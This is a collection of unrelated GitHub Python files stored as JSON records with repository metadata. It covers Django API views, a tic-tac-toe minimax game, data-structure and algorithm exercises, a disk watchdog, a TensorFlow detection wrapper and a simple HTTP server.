URI_HAS_COMPETENT_AUTHORITY,\n URI_IS_CLASSIFIED_BY,\n \"http://cefat4cities.com/public_services/hasBusinessEvent\",\n \"http://cefat4cities.com/public_services/hasLifeEvent\",\n ]\n\n return mock_data\n\n\nclass ContactPointsEntityOptionsAPIView(EntityOptionsAPIView):\n @staticmethod\n def get_mock_data():\n mock_data = [\n URI_HAS_CONTACT_POINT,\n ]\n\n return mock_data\n\n\nclass DropdownOptionsAPIView(APIView, abc.ABC):\n queryset = PublicService.objects.none()\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request, format=None, *args, **kwargs):\n uri_type_has = request.data[\"uri_type\"]\n keyword = request.data[\"keyword\"]\n dict_rdf_filters = request.data[\"rdfFilters\"]\n\n values = self.get_values(uri_type_has)\n\n return Response(values)\n\n @staticmethod\n @abc.abstractmethod\n def get_values(uri_type_has):\n pass\n\n\nclass DropdownOptionsPublicServicesAPIView(DropdownOptionsAPIView):\n @staticmethod\n def get_values(uri_type_has):\n values = get_dropdown_options_for_public_services(uri_type_has)\n return values\n\n\nclass DropdownOptionsContactPointsAPIView(DropdownOptionsAPIView):\n @staticmethod\n def get_values(uri_type_has):\n values = get_dropdown_options_for_contact_points(uri_type_has)\n return values\n\n\nclass FusekiDatasetAPIView(APIView):\n queryset = PublicService.objects.none()\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request, format=None):\n\n req_data = {\"query\": request.data[\"query\"]}\n\n r = requests.post(RDF_FUSEKI_URL, data=req_data)\n return Response(r.content)\n","repo_name":"CrossLangNV/C4C_web_app","sub_path":"django/cpsv/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"23342814904","text":"import sys\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.figure()\r\n\r\nnameslist = [\"DNS_Re500_255.csv\", \"iLES_Re500_255_nonBDIM.csv\", \"test.csv\", \"iLES_Re500_255.csv\", \"filtDNS_Re500_255.csv\"]\r\n\r\nfor arg in nameslist:\r\n data = pd.read_csv(\"1D BDIM Burgers'/\"+arg, header=None)\r\n print(data)\r\n plt.plot(data.iloc[:,0], data.iloc[:,1], label=arg[:-4])\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n","repo_name":"J-Leetch/MSc-Project","sub_path":"1D BDIM Burgers'/plot_profiles.py","file_name":"plot_profiles.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"34150858300","text":"import sys \ninput = sys.stdin.readline\nN, C = map(int, input().split())\nlocations = [int(input()) for _ in range(N)]\nlocations.sort()\n\nstart = 1\nend = locations[-1] - locations[0]\nbest = 0\nwhile start <= end:\n mid = (start + end) // 2\n next_elem = 0\n cnt = 0\n for loc in locations:\n if loc >= next_elem:\n next_elem = loc + mid\n cnt += 1\n \n if cnt >= C:\n start = mid + 1\n best = mid\n else:\n end = mid - 1\n\nprint(best)\n\n","repo_name":"Roha-Lee/Algorithm-Study","sub_path":"BOJ/Traverse/2110.py","file_name":"2110.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"73006834684","text":"import os\nimport time\nfrom pathlib import Path\nfrom urllib.parse import quote\n\nimport watchdog.events\nimport watchdog.observers\nfrom isardvdi_common.api_rest import ApiRest\n\nfrom api import app\n\n\ndef _get_path_kind(directory):\n if \"/templates/\" in directory:\n kind = \"domains\"\n if \"/groups/\" in directory:\n kind = \"domains\"\n if \"/media/\" in directory:\n kind = \"media\"\n return kind\n\n\nclass Handler(watchdog.events.PatternMatchingEventHandler):\n def __init__(self):\n flavour = os.environ.get(\"FLAVOUR\", False)\n if str(flavour) == \"all-in-one\" or not flavour:\n self.hostname = \"isard-hypervisor\"\n else:\n self.hostname = os.environ.get(\"DOMAIN\")\n api_domain = os.environ.get(\"API_DOMAIN\", False)\n if api_domain and api_domain != \"isard-api\":\n self.api_rest = ApiRest(\"isard-api\")\n\n self.templates_path = \"/isard/templates\"\n self.desktops_path = \"/isard/groups\"\n self.media_path = \"/isard/media\"\n\n self.update_disks()\n watchdog.events.PatternMatchingEventHandler.__init__(\n self,\n patterns=[\"*.qcow2\", \"*.iso\"],\n ignore_directories=True,\n case_sensitive=False,\n )\n\n def update_disks(self):\n self.template_files = [\n {\n \"id\": str(p),\n \"path\": str(p),\n \"hyper\": self.hostname,\n \"kind\": \"template\",\n \"size\": p.stat().st_size,\n }\n for p in Path(self.templates_path).rglob(\"*\")\n if p.is_file()\n ]\n self.desktop_files = [\n {\n \"id\": str(p),\n \"path\": str(p),\n \"hyper\": self.hostname,\n \"kind\": \"desktop\",\n \"size\": p.stat().st_size,\n }\n for p in Path(self.desktops_path).rglob(\"*\")\n if p.is_file()\n ]\n self.api_rest.put(\n \"/storage/physical/init/domains\",\n self.template_files + self.desktop_files,\n )\n self.media_files = [\n {\n \"id\": str(hash(p.stat())),\n \"path\": str(p),\n \"hyper\": self.hostname,\n \"kind\": \"media\",\n \"size\": p.stat().st_size,\n }\n for p in Path(self.media_path).rglob(\"*\")\n if p.is_file()\n ]\n self.api_rest.put(\n \"/storage/physical/init/media\",\n self.media_files,\n )\n app.logger.info(\"- updated disks to api\")\n\n def on_created(self, event):\n app.logger.info(\"- received created event - % s.\" % event.src_path)\n p = Path(event.src_path)\n kind = _get_path_kind(event.src_path)\n self.api_rest.put(\n \"/storage/physical/\" + kind,\n {\n \"id\": str(p),\n \"path\": str(p),\n \"hyper\": self.hostname,\n \"kind\": kind,\n \"size\": p.stat().st_size,\n },\n )\n\n def on_deleted(self, event):\n app.logger.info(\"- received delete event - % s.\" % event.src_path)\n p = Path(event.src_path)\n kind = _get_path_kind(event.src_path)\n self.api_rest.delete(\"/storage/physical/\" + kind + \"/{}\".format(quote(str(p))))\n\n def on_moved(self, event):\n app.logger.info(\"- received moved event - % s.\" % event.src_path)\n # Event is moved, you can process it now\n\n\ndef start_disks_watchdog():\n src_path = r\"/isard\"\n event_handler = Handler()\n observer = watchdog.observers.Observer()\n observer.schedule(event_handler, path=src_path, recursive=True)\n observer.start()\n app.logger.info(\"- started disks watchdog\")\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","repo_name":"isard-vdi/isard","sub_path":"docker/storage/api.old/api/libv2/api_disks_watchdog.py","file_name":"api_disks_watchdog.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"41"} +{"seq_id":"19302660857","text":"class SingleNode:\n def __init__(self, elem):\n self.elem = elem\n self.next = None\n\n\nclass SimpleLinkedList:\n \"\"\"\n 单向链表\n \"\"\"\n\n def __init__(self, node=None):\n \"\"\"\n :param node:默认是空链表\n \"\"\"\n self.__head = node\n\n def is_empty(self):\n \"\"\"\n 判断是否为空\n :return:\n \"\"\"\n return self.__head is None\n\n def length(self):\n \"\"\"\n 链表的长度\n :return:count\n \"\"\"\n # 如果是空链表直接就返回count=0\n cur = self.__head\n count = 0\n while cur is not None:\n count += 1\n cur = cur.next\n return count\n\n def travel(self):\n \"\"\"\n 遍历链表\n :return:\n \"\"\"\n cur = self.__head\n while cur is not None:\n print(cur.elem, end=' ')\n cur = cur.next\n\n def add(self, elem):\n \"\"\"\n 从链表的头部添加元素\n :param elem:\n :return:\n \"\"\"\n node = SingleNode(elem)\n \"\"\"\n # 下面也可以处理是空链表的情况\n if self.is_empty():\n self.__head = node\n node.next = self.__head\n \"\"\"\n node.next = self.__head\n self.__head = node\n\n def append(self, elem):\n \"\"\"\n 尾部添加元素\n :param elem:\n :return:\n \"\"\"\n node = SingleNode(elem)\n if self.is_empty():\n self.__head = node\n else:\n cur = self.__head\n while cur.next is not None:\n cur = cur.next\n cur.next = node\n\n def insert(self, pos, elem):\n node = SingleNode(elem)\n if pos <= 0:\n self.add(elem)\n return\n elif pos > self.length() - 1:\n self.append(elem)\n return\n pre = self.__head\n count = 0\n while count < pos - 1:\n pre = pre.next\n count += 1\n node.next = pre.next\n pre.next = node\n\n def search(self, elem):\n \"\"\"\n 查找元素\n :param self:\n :param elem:\n :return:\n \"\"\"\n # 也可以处理空链表的情况\n cur = self.__head\n while cur is not None:\n if cur.elem == elem:\n return True\n else:\n cur = cur.next\n return False\n\n def remove(self, elem):\n pre = None\n cur = self.__head\n # 适用于空节点和删除头节点\n while cur is not None:\n if cur.elem == elem:\n # 判断当前节点是否是头节点\n # 也可以解决链表中只有一个头节点\n if cur == self.__head:\n self.__head = self.__head.next\n # self.__head = cur.next\n else:\n # 也适用于删除尾部节点\n pre.next = cur.next\n break\n else:\n pre = cur\n cur = cur.next\n\n\nsll = SimpleLinkedList()\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('------在链表尾部添加节点------')\nsll.append(1)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nsll.append(2)\nsll.append(3)\nsll.append(4)\nsll.append(5)\nsll.append(6)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('遍历链表:', end='')\nsll.travel()\nprint('\\n------在链表头部添加节点-----')\nsll.add(7)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('遍历链表:', end='')\nsll.travel()\nprint('\\n------在指定位置插入节点-----')\nsll.insert(0, 8)\nsll.insert(2, 9)\nsll.insert(9, 10)\nsll.insert(10, 10)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('遍历链表:', end='')\nsll.travel()\nprint('\\n------删除指定位置的元素,实现的效果类似列表的remove方法-----')\nsll.remove(7)\nsll.remove(1)\nsll.remove(10)\nprint('当前链表是否为空:', sll.is_empty())\nprint('当前链表长度:', sll.length())\nprint('遍历链表:', end='')\nsll.travel()\n\"\"\"\n当前链表是否为空: True\n当前链表长度: 0\n------在链表尾部添加节点------\n当前链表是否为空: False\n当前链表长度: 1\n当前链表是否为空: False\n当前链表长度: 6\n遍历链表:1 2 3 4 5 6 \n------在链表头部添加节点-----\n当前链表是否为空: False\n当前��表长度: 7\n遍历链表:7 1 2 3 4 5 6 \n------在指定位置插入节点-----\n当前链表是否为空: False\n当前链表长度: 11\n遍历链表:8 7 9 1 2 3 4 5 6 10 10 \n------删除指定位置的元素,实现的效果类似列表的remove方法-----\n当前链表是否为空: False\n当前链表长度: 8\n遍历链表:8 9 2 3 4 5 6 10\n\"\"\"\n","repo_name":"ThanlonSmith/data-structure-python3","sub_path":"codes/链表的实现/单链表的实现.py","file_name":"单链表的实现.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"41"} +{"seq_id":"19080542082","text":"#----------\r\n# Devin Suy\r\n#----------\r\n\r\nfrom Game.Board import Board \r\nfrom Game.Player import Player\r\nfrom Algorithm.MiniMax import MiniMax\r\nfrom pathlib import Path\r\nimport pickle\r\nimport sys\r\n\r\nclass Game:\r\n def __init__(self):\r\n # Enumerate all possible 3 in a row positions\r\n self.win_positions = [[0,4,8], [2,4,6], [0,1,2], [3,4,5], [6,7,8], [0,3,6], [1,4,7], [2,5,8]]\r\n self.board = Board()\r\n self.human = Player()\r\n self.bot = Player(True) \r\n self.opening_move = True\r\n\r\n def reset_game(self):\r\n self.board.reset_board()\r\n self.human.reset_player()\r\n self.bot.reset_player()\r\n self.opening_move = True\r\n\r\n # Takes in a list of the symbols in each cell and \r\n # sets the game to this state\r\n # EX: board[0] corresponds to what symbol may be in the top left cell \"X\" or \"O\" or \" \"\r\n def import_board(self, board):\r\n self.reset_game()\r\n for cell_num, symbol in enumerate(board):\r\n if symbol == \" \":\r\n continue\r\n elif symbol == \"X\":\r\n player = self.human\r\n else:\r\n player = self.bot\r\n\r\n self.board.set_cell(cell_num, player)\r\n \r\n # print(\"Imported board\")\r\n # self.board.draw()\r\n # print(\"Human (X): \", self.human.placements)\r\n # print(\"Bot (O): \", self.bot.placements)\r\n # print(\"Avail: \", self.board.avail_cell_nums)\r\n # print(\"Placed: \", self.board.placed_cell_nums)\r\n \r\n\r\n def board_is_full(self):\r\n return len(self.board.placed_cell_nums) == 9\r\n\r\n def get_cell(self, cell_num):\r\n return self.board.get_cell(cell_num)\r\n\r\n def game_over(self, player):\r\n for win_position in self.win_positions:\r\n # The player has placed 3 pieces in a win position\r\n if set(win_position).issubset(player.placements):\r\n return True\r\n\r\n return False\r\n\r\n # Function only called to prompt human player\r\n def select_move(self):\r\n try:\r\n selected_cell = int(input(\"\\n Human player select your move: \"))\r\n if selected_cell < 0 or selected_cell > 8 or selected_cell in self.board.placed_cell_nums:\r\n raise ValueError()\r\n except ValueError:\r\n # Input validation\r\n while True:\r\n try:\r\n selected_cell = int(input(\" ERROR, please select a valid cell: \"))\r\n if selected_cell >= 0 and selected_cell < 9 and selected_cell in self.board.avail_cell_nums:\r\n break\r\n except:\r\n continue\r\n\r\n return selected_cell\r\n\r\n # Have the Human player select an available cell\r\n def make_move(self, player):\r\n selected_cell_num = self.select_move() \r\n self.board.set_cell(selected_cell_num, player)\r\n self.board.draw()\r\n print(\"\\n \", player.name, \"places an\", player.symbol, \"@ position\", selected_cell_num)\r\n\r\n # Load the appropiate pre-processed states corresponding\r\n # to the opening move\r\n if self.opening_move:\r\n print(\"\\nEvaluating . . .\")\r\n load_path = Path(\"saved_states\")\r\n in_file = open(load_path.joinpath(\"states_\" + str(selected_cell_num) + \".obj\"), \"rb\")\r\n self.loaded_states = pickle.load(in_file)\r\n self.mm = MiniMax(self.loaded_states)\r\n self.current_state = self.loaded_states[-1]\r\n self.opening_move = False\r\n \r\n # Locate the successor state that corresponds to the move\r\n # that the human player just made and set that to our current state\r\n else:\r\n for succesor_state in self.current_state.successors:\r\n if succesor_state.game_state.board.avail_cell_nums == self.board.avail_cell_nums:\r\n self.current_state = succesor_state\r\n break\r\n\r\n\r\n # Bot is always maximizer\r\n def bot_make_move(self):\r\n optimal_score = self.current_state.state_score\r\n optimal_state = None\r\n \r\n # Find the successor of our current state that is the optimal move\r\n for successor_state in self.current_state.successors:\r\n if successor_state.state_score == optimal_score:\r\n optimal_state = successor_state\r\n\r\n # Our most recently added cell_num between the optimal successor state and our\r\n # current state is the is the Set difference of the placed_cell_nums of the two\r\n cache_utilized = False\r\n selected_cell_num = (optimal_state.game_state.board.placed_cell_nums - self.current_state.game_state.board.placed_cell_nums).pop()\r\n if selected_cell_num in self.board.avail_cell_nums:\r\n self.current_state = successor_state # Update pointer\r\n break\r\n\r\n \r\n self.board.set_cell(selected_cell_num, self.bot)\r\n self.board.draw()\r\n print(\"\\n Predicted State Value: \", optimal_score)\r\n print(\" Bot places an O @ position\", selected_cell_num)\r\n\r\n\r\n def validate_input(self, upper_bound):\r\n try:\r\n menu_selection = int(input(\"Enter your selection: \")) \r\n if menu_selection < 1 or menu_selection > upper_bound:\r\n raise ValueError()\r\n except ValueError:\r\n while True:\r\n try:\r\n menu_selection = int(input(\" ERROR, please select a valid option: \"))\r\n if menu_selection > 0 and menu_selection <= upper_bound:\r\n break\r\n except:\r\n continue\r\n\r\n return menu_selection \r\n\r\n def play(self):\r\n print(\"Tic-Tac-Toe\\n-----------\")\r\n print(\" Welcome Human! You are player X\")\r\n self.board.draw_display_board()\r\n\r\n # Human player always makes opening move and is designated (X)\r\n human_turn = game_tied = True\r\n \r\n while not self.board_is_full():\r\n if human_turn:\r\n self.make_move(self.human)\r\n if self.game_over(self.human):\r\n game_tied = False\r\n print(\"\\nHuman Player Has Won!!\")\r\n break\r\n else:\r\n self.bot_make_move()\r\n if self.game_over(self.bot):\r\n game_tied = False\r\n print(\"\\nComputer Player Has Won!!\")\r\n break\r\n\r\n human_turn = not human_turn # Turn taking\r\n\r\n if game_tied:\r\n print(\"\\nHuman and Computer have tied!!\")\r\n\r\n # Menu system\r\n print(\"\\nGame Over\\n---------\")\r\n print(\" 1. Play Again\")\r\n print(\" 2. Exit\\n\")\r\n menu_selection = self.validate_input(2)\r\n\r\n if menu_selection == 1:\r\n print(\"\\nStarting New Game . . .\\n\")\r\n self.reset_game()\r\n self.play()\r\n else:\r\n print(\"\\nTerminating . . . Goodbye!\")\r\n\r\n \r\n\r\n\r\n \r\n\r\n","repo_name":"devinsuy/Tic-Tac-AI-Player","sub_path":"Game/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"74604172284","text":"from loggers.logger_base import *\n\n\nclass TXTLogger(BaseLogger):\n def __init__(self, log_path=\"\"):\n super().__init__()\n if log_path == \"\":\n t = datetime.now()\n t = t.strftime(\"%Y%m%d_%H%M%S\")\n self.log_path = f\"./logs/{t}.txt\"\n else:\n self.log_path = log_path\n\n t = self.log_path.split(\"/\")\n self.log_prefix = t[0] + \"/\" + t[1]\n if not os.path.exists(self.log_prefix):\n os.makedirs(self.log_prefix)\n\n # elements:\n # {role: info, content: [agent_info]},\n # {role: ..., content: ...},\n # {role: coverage, content: [coverage_plan]}\n # {role: stop, content: done | max stimuli number}\n # {role: reset}\n self.log: List[List[Dict[str, Union[str, dict]]]] = [[]]\n self.logged_index = 0 # log index for logging\n\n self.logged_dialog_index = 1 # dialog index for logging\n self.logged_msg_index = 0 # dialog index for logging\n self.logged_total_msg_cnt = 0 # dialog index for logging\n\n def save_log(self):\n with open(self.log_path, \"a+\") as f:\n while self.logged_index < len(self.log[-1]):\n rec = self.log[-1][self.logged_index]\n\n if rec[\"role\"] == \"info\":\n agent_info: Dict[str, str] = rec[\"content\"]\n for k, v in agent_info.items():\n f.write(f\"{k}: {v}\\n\")\n f.write(\"\\n\")\n\n elif rec[\"role\"] == \"coverage\":\n coverage: Dict[str, int] = rec[\"content\"]\n coverage_plan = {k: v for (k, v) in coverage.items() if v > 0}\n f.write(f\"Coverage rate: {len(coverage_plan)} / {len(coverage)}\\n\")\n f.write(f\"Coverage plan: {coverage_plan}\\n\\n\")\n\n elif rec[\"role\"] == \"stop\":\n f.write(f'Stop: {rec[\"content\"]}\\n\\n')\n\n elif rec[\"role\"] == \"reset\":\n f.write(\"\\n<<<<< RESET >>>>>\\n\\n\\n\")\n\n else:\n if rec[\"role\"] == \"user\":\n self.logged_msg_index += 1\n self.logged_total_msg_cnt += 1\n f.write(f\"Dialog index: {self.logged_dialog_index}\\n\")\n f.write(f\"Message index: {self.logged_msg_index}\\n\")\n f.write(f\"Total msg cnt: {self.logged_total_msg_cnt}\\n\")\n if rec[\"role\"] != \"system\":\n f.write(f'Token counts: {rec[\"token cnt\"]}\\n')\n f.write(f'Role: {rec[\"role\"]}\\n')\n f.write(f'Content: {rec[\"content\"]}\\n\\n')\n\n self.logged_index += 1\n","repo_name":"ZixiBenZhang/ml4dv","sub_path":"loggers/logger_txt.py","file_name":"logger_txt.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"32980191825","text":"from random import choice\r\n\r\n\r\ndef get_allowed(size, prev_queens, current_line):\r\n positions = [True] * size\r\n for i in range(size):\r\n if i in prev_queens:\r\n positions[i] = False\r\n continue\r\n for j in range(len(prev_queens)):\r\n if abs(i - prev_queens[j]) == current_line - j:\r\n positions[i] = False\r\n break\r\n return [i for i in range(len(positions)) if positions[i]]\r\n \r\n\r\n\r\ndef recurse(question_size, line=0, back=False):\r\n while line < question_size:\r\n if back: # The next line has no solution\r\n stack[line].remove(queen.pop()) # Recent cause no solution\r\n else: # New line\r\n stack[line] = get_allowed(question_size, queen, line)\r\n if stack[line]: # If current line has solution\r\n queen.append(choice(stack[line]))\r\n return recurse(question_size, line + 1)\r\n else: # If not\r\n return recurse(question_size, line - 1, back=True)\r\n return queen\r\n\r\n\r\ndef print_chestboard(board):\r\n for i in range(8):\r\n line = [' |_| '] * 8\r\n line[board[i]] = ' |Q| '\r\n print(''.join(line)+'\\n')\r\n\r\n\r\nqueen = []\r\nstack = [[]] * 8\r\nrecurse(8)\r\nprint_chestboard(queen)\r\n","repo_name":"SE-starshippilot/CSC1001","sub_path":"Assignment 2/q2-6.py","file_name":"q2-6.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"41"} +{"seq_id":"23144179922","text":"n = int(input())\narr = [[0 for i in range(10)] for j in range(n)]\narr[0] = [0, 1, 1, 1, 1, 1, 1, 1, 1, 1]\nM = 1000000000\nfor i in range(1, n):\n temp = [0 for j in range(10)]\n temp[0] = arr[i - 1][1]\n temp[9] = arr[i - 1][8]\n for j in range(1, 9):\n temp[j] = (arr[i - 1][j - 1]%M + arr[i - 1][j + 1]%M)%M\n arr[i] = temp\n\nprint(sum(arr[n - 1])%M)","repo_name":"YunhoKim21/Algorithm","sub_path":"2022-01/dynamic programming/stairnum.py","file_name":"stairnum.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"18878057808","text":"import tensorflow as tf\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\nclass MyModule(tf.Module):\n def __init__(self, model, **kwargs):\n super(MyModule, self).__init__(**kwargs)\n self.model = model\n\n @tf.function(input_signature=[tf.TensorSpec(shape=(1, None, None, 3), dtype=tf.uint8),\n tf.TensorSpec(shape=(1), dtype=tf.float32),\n tf.TensorSpec(shape=(2), dtype=tf.float32)])\n def update_signature(self, edet_input_image, det_thres, det_xy_change): # edet_input_image is the input name\n output = self.model(edet_input_image)\n det_boxes = output[0][0] # 100,4\n det_scores = output[1][0] # 100\n det_classes = output[2][0] # 100\n fil_det_boxes = tf.zeros([100, 4], dtype=tf.float32) # placeholder\n\n # postprocessing which is preprocessing for the next model in pipeline done here\n human_class_idx = tf.squeeze(tf.where(det_classes == 1.0), axis=1)\n\n # det_thres = 0.65\n # filter non human classes from det_scores and det boxes\n fil_det_scores = tf.gather(\n det_scores, human_class_idx, axis=0) # (None,)\n fil_det_boxes = tf.gather(\n det_boxes, human_class_idx, axis=0) # (None, 4,), y1, x1, y2, x2\n\n # filter low score human detections from bboxes, only take 3 boxes at max\n high_scores_idx = tf.squeeze(\n tf.where(fil_det_scores >= det_thres), axis=1) # (None,)\n fil_det_boxes = tf.gather(\n fil_det_boxes, high_scores_idx, axis=0)[:3] # (None, 4,)\n\n h = tf.shape(edet_input_image)[1]\n w = tf.shape(edet_input_image)[2]\n x_change = det_xy_change[0]\n y_change = det_xy_change[1]\n # increase the size of bounding boxes\n hf = tf.cast(h, dtype=tf.float32)\n wf = tf.cast(w, dtype=tf.float32)\n y1 = fil_det_boxes[:, 0] - y_change # (3, 1)\n y1 = tf.clip_by_value(y1, clip_value_min=0, clip_value_max=hf)\n x1 = fil_det_boxes[:, 1] - x_change # (3, 1)\n x1 = tf.clip_by_value(x1, clip_value_min=0, clip_value_max=wf)\n y2 = fil_det_boxes[:, 2] + y_change # (3, 1)\n y2 = tf.clip_by_value(y2, clip_value_min=0, clip_value_max=hf)\n x2 = fil_det_boxes[:, 3] + x_change # (3, 1)\n x2 = tf.clip_by_value(x2, clip_value_min=0, clip_value_max=wf)\n fil_det_boxes_expand = tf.stack([y1, x1, y2, x2], axis=1)\n\n # get a [h,w,h,w] tensor where h,w = orig image height,width\n edet_input_image_tensor = tf.cast([h, w, h, w], dtype=tf.float32)\n # normalize bbox coords to [0,1] by dividing by the orig image dimensions\n fil_det_boxes = fil_det_boxes_expand / edet_input_image_tensor\n\n edet_input_image = tf.cast(edet_input_image, dtype=tf.float32)\n edet_input_image /= 255.0 # normalize to range 0 to 1\n crop_size = (384, 288)\n batch_size = 1 # since we will be streaming images to this human det model\n box_indices = tf.random.uniform(shape=(len(fil_det_boxes),),\n minval=0,\n maxval=batch_size,\n dtype=tf.int32)\n human_crops = tf.image.crop_and_resize(edet_input_image,\n fil_det_boxes,\n box_indices,\n crop_size)\n\n def _human_det():\n return human_crops\n\n def _no_human_det():\n return tf.zeros([1, 384, 288, 3], dtype=tf.dtypes.float32)\n\n human_crops = tf.cond(\n tf.equal(tf.shape(human_crops)[0], 0), _no_human_det, _human_det)\n human_crops = tf.transpose(human_crops, perm=[0, 3, 1, 2])\n\n return {\"detection_boxes\": det_boxes,\n \"detection_scores\": det_scores,\n \"detection_classes\": det_classes,\n \"filtered_boxes\": fil_det_boxes,\n \"human_crops\": human_crops}\n\n\ndef main():\n model = tf.saved_model.load(\n \"../extra_models/edetlite4/1/model.savedmodel/\",\n tags=\"serve\")\n\n module = MyModule(model)\n save_path = \"edetlite4_modified_new/1/model.savedmodel\"\n os.makedirs(save_path, exist_ok=True)\n\n tf.saved_model.save(module,\n save_path,\n signatures={\"serving_default\": module.update_signature})\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SamSamhuns/human_body_proportion_estimation","sub_path":"models/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"29765520768","text":"\n\n\"\"\"\n完成httpserver的并发\n并发使用多线程完成\n用不同的后端程序处理不同的请求\n可以简单的显示静态页面\n\"\"\"\nimport sys\nfrom socket import *\nfrom threading import Thread\n#全局变量\nADDR=('0.0.0.0',8000)\n#存静态网页\nstatic_root=\"./static\"\n#存放python处理模块\nhanler_root=\"./hanler\"\n#httpserver 类\nclass HTTPServer(object):\n def __init__(self,addr):\n self.sockfd=socket()\n self.sockfd.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)\n self.sockfd.bind(addr)\n self.sockfd.listen(5)\n\n self.serveName=\"127.0.0.1\"\n self.servePort=8000\n #服务器启动函数:接受客户端请求,创建新的线程\n def serveForever(self):\n while True:\n self.connfd,self.clientAddr=self.sockfd.accept()\n clientThread=Thread(target=self.handleRequest)\n clientThread.start()\n\n def setApp(self,application):\n self.application=application\n\n def handleRequest(self):\n # 接收request请求\n self.recvData=self.connfd.recv(2048)\n requestHeaders=self.recvData.splitlines()\n for lien in requestHeaders:\n print(lien) \n #获取到从浏览器输入的具体请求\n getRequest=str(requestHeaders[0]).split(' ')[1]\n if getRequest[-3:] !=\".py\":\n if getRequest ==\"/\":\n getFilename=static_root+\"/index.html\"\n else:\n getFilename=static_root+getRequest\n try:\n f=open(getFilename)\n except:\n responseHeaders=\"HTTP/1.1 404 not find\\r\\n\"\n responseHeaders+=\"\\r\\n\"\n responseBody=\"========sorry,file not find=======\"\n else:\n responseHeaders=\"HTTP/1.1 200 OK\\r\\n\"\n responseHeaders+=\"\\r\\n\"\n responseBody=f.read()\n finally:\n response=responseHeaders+responseBody\n self.connfd.send(response.encode())\n else:\n #需要的环境变量\n env={}\n bodyContent=self.application(env,self.startResponse)\n response=\"HTTP/1.1 {}\\r\\n\".format(self.header_set[0])\n for header in self.header_set[1:]:\n response+=\"{0}:{1}\\r\\n\".format(*header)\n response+=\"\\r\\n\"\n response+=bodyContent\n self.connfd.send(response.encode())\n self.connfd.close()\n\n def startResponse(self,status,response_headlers):\n serverHeaders=[\n ('Date',\"2018-5-21\"),\n (\"Server\",\"HTTPServer 1.0\")\n ]\n self.header_set=[status,response_headlers+serverHeaders]\n#控制服务器启动\ndef main():\n #启动时 直接告知使用哪个模块那个函数处理请求\n #python3 HttpServer.python3 module app\n if len(sys.argv)<3:\n sys.exit(\"请选择一个模块和应用\")\n #将handler文件夹加入搜索路径\n sys.path.insert(0,hanler_root) \n #导入module模块 \n m=__import__(sys.argv[1])\n #获取 module 模块下的app 赋值给一个变量\n application=getattr(m,sys.argv[2])\n httpd=HTTPServer(ADDR)\n httpd.setApp(application)\n print(\"Serving HTTP on port 8000\")\n httpd.serveForever()\nif __name__==\"__main__\":\n main()","repo_name":"qianpeng-shen/Study_notes","sub_path":"第二阶段笔记/pythonweb/day09/HttpServer.py","file_name":"HttpServer.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"12722095115","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom .import views\n\nurlpatterns = [\n \n path('',views.home,name='home'),\n path('about/',views.about,name='about'),\n path('services/',views.services,name='services'),\n path('contact/',views.contact,name='contacts'),\n \n path('team/',views.team,name='team'),\n path('terms/',views.terms,name='terms'),\n path('cliq/',views.cliq,name='cliq'),\n path('products/',views.products,name='products'),\n path('calendar/',views.calendar,name='calendar'),\n path('investment/',views.investment,name='investment'),\n\n path('privacy/',views.privacy,name='privacy'),\n path('otp/',views.otp,name='otp'),\n path('omis/',views.omis,name='omis'),\n path('gallery/',views.gallery,name='gallery')\n\n]\n","repo_name":"asterinnovations/newwebsite","sub_path":"website/website1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"10126573294","text":"#!/usr/bin/python3\n'''Sequence to sequence grammar check.\n'''\nfrom __future__ import print_function\n\nimport math\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, CuDNNLSTM, Dense, Embedding, Reshape, Concatenate, Lambda, Conv1D\nfrom keras import backend as K\nimport numpy as np\nimport h5py\nimport sys\nimport encoding\n\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 